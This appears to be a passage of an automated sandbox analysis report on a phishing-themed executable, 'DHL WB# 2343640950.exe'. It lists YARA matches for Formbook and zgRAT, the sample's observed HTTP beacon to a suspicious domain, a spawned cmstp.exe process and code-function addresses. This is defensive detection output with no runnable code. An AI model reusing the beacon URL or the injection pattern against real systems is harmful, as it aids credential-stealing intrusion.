          Source: global trafficHTTP traffic detected: GET /183b/?3f=0pQLi&GTWHLhf=aeRI+VtYzSQE3A1d41SuiJFmY5rxFnxGMgk+ebPO7waK3tnPCQEIkRgDBSC82MoPtV6fY2DLrg== HTTP/1.1Host: www.paycheckstubonlin.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: DHL WB# 2343640950.exe, 00000000.00000002.421545726.0000000000A98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 5.0.DHL WB# 2343640950.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DHL WB# 2343640950.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DHL WB# 2343640950.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DHL WB# 2343640950.exe.39fbeb0.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DHL WB# 2343640950.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.DHL WB# 2343640950.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DHL WB# 2343640950.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.DHL WB# 2343640950.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DHL WB# 2343640950.exe.38555a0.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.508076221.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.508816712.00000000012F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.425718736.0000000003980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.493111927.000000000EBB3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.425338191.0000000003855000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.417761109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.466672366.000000000EBB3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.417286385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.641809703.0000000000EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.508664053.00000000012C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.640957593.0000000000610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.641933655.0000000000F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 0.2.DHL WB# 2343640950.exe.6fd0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
          Source: 5.0.DHL WB# 2343640950.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.DHL WB# 2343640950.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.DHL WB# 2343640950.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.DHL WB# 2343640950.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.DHL WB# 2343640950.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.DHL WB# 2343640950.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.DHL WB# 2343640950.exe.39fbeb0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
          Source: 0.2.DHL WB# 2343640950.exe.39fbeb0.7.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.DHL WB# 2343640950.exe.39fbeb0.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.DHL WB# 2343640950.exe.39fbeb0.7.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
          Source: 5.0.DHL WB# 2343640950.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.DHL WB# 2343640950.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.DHL WB# 2343640950.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.DHL WB# 2343640950.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.DHL WB# 2343640950.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.DHL WB# 2343640950.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.DHL WB# 2343640950.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.DHL WB# 2343640950.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.DHL WB# 2343640950.exe.6fd0000.9.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
          Source: 0.2.DHL WB# 2343640950.exe.38555a0.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.DHL WB# 2343640950.exe.38555a0.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.508076221.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.508076221.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.508816712.00000000012F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.508816712.00000000012F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.425718736.0000000003980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.425718736.0000000003980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.493111927.000000000EBB3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.493111927.000000000EBB3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.425338191.0000000003855000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.425338191.0000000003855000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.417761109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.417761109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.466672366.000000000EBB3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.466672366.000000000EBB3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.417286385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.417286385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.641809703.0000000000EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.641809703.0000000000EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.508664053.00000000012C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.508664053.00000000012C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.640957593.0000000000610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.640957593.0000000000610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.428458566.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects zgRAT Author: ditekSHen
          Source: 0000000D.00000002.641933655.0000000000F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.641933655.0000000000F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: DHL WB# 2343640950.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: 0.2.DHL WB# 2343640950.exe.6fd0000.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
          Source: 5.0.DHL WB# 2343640950.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.DHL WB# 2343640950.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.DHL WB# 2343640950.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.DHL WB# 2343640950.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.DHL WB# 2343640950.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.DHL WB# 2343640950.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.DHL WB# 2343640950.exe.39fbeb0.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
          Source: 0.2.DHL WB# 2343640950.exe.39fbeb0.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.DHL WB# 2343640950.exe.39fbeb0.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.DHL WB# 2343640950.exe.39fbeb0.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
          Source: 5.0.DHL WB# 2343640950.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.DHL WB# 2343640950.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.DHL WB# 2343640950.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.DHL WB# 2343640950.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.DHL WB# 2343640950.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.DHL WB# 2343640950.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.DHL WB# 2343640950.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.DHL WB# 2343640950.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.DHL WB# 2343640950.exe.6fd0000.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
          Source: 0.2.DHL WB# 2343640950.exe.38555a0.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.DHL WB# 2343640950.exe.38555a0.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.508076221.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.508076221.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.508816712.00000000012F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.508816712.00000000012F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.425718736.0000000003980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.425718736.0000000003980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.493111927.000000000EBB3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.493111927.000000000EBB3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.425338191.0000000003855000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.425338191.0000000003855000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.417761109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.417761109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.466672366.000000000EBB3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.466672366.000000000EBB3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.417286385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.417286385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.641809703.0000000000EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.641809703.0000000000EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.508664053.00000000012C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.508664053.00000000012C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.640957593.0000000000610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.640957593.0000000000610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.428458566.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
          Source: 0000000D.00000002.641933655.0000000000F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.641933655.0000000000F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 0_2_002B8791
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 0_2_0257D15C
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 0_2_0257B094
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 0_2_0257F5B2
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 0_2_0257DB30
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 0_2_0257DB22
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 4_2_00278739
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 4_2_00278701
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 5_2_0041E85D
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 5_2_0041D863
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 5_2_00401030
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 5_2_0041EBC3
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 5_2_0041EBC6
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 5_2_0041DD18
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 5_2_00402D8C
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 5_2_00402D90
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 5_2_00409E60
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 5_2_00402FB0
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 5_2_00D88701
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 5_2_00D88739
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04761002
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046B841F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D20A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_047720A8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046BB090
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04771D55
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046A0D20
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046C4120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046AF900
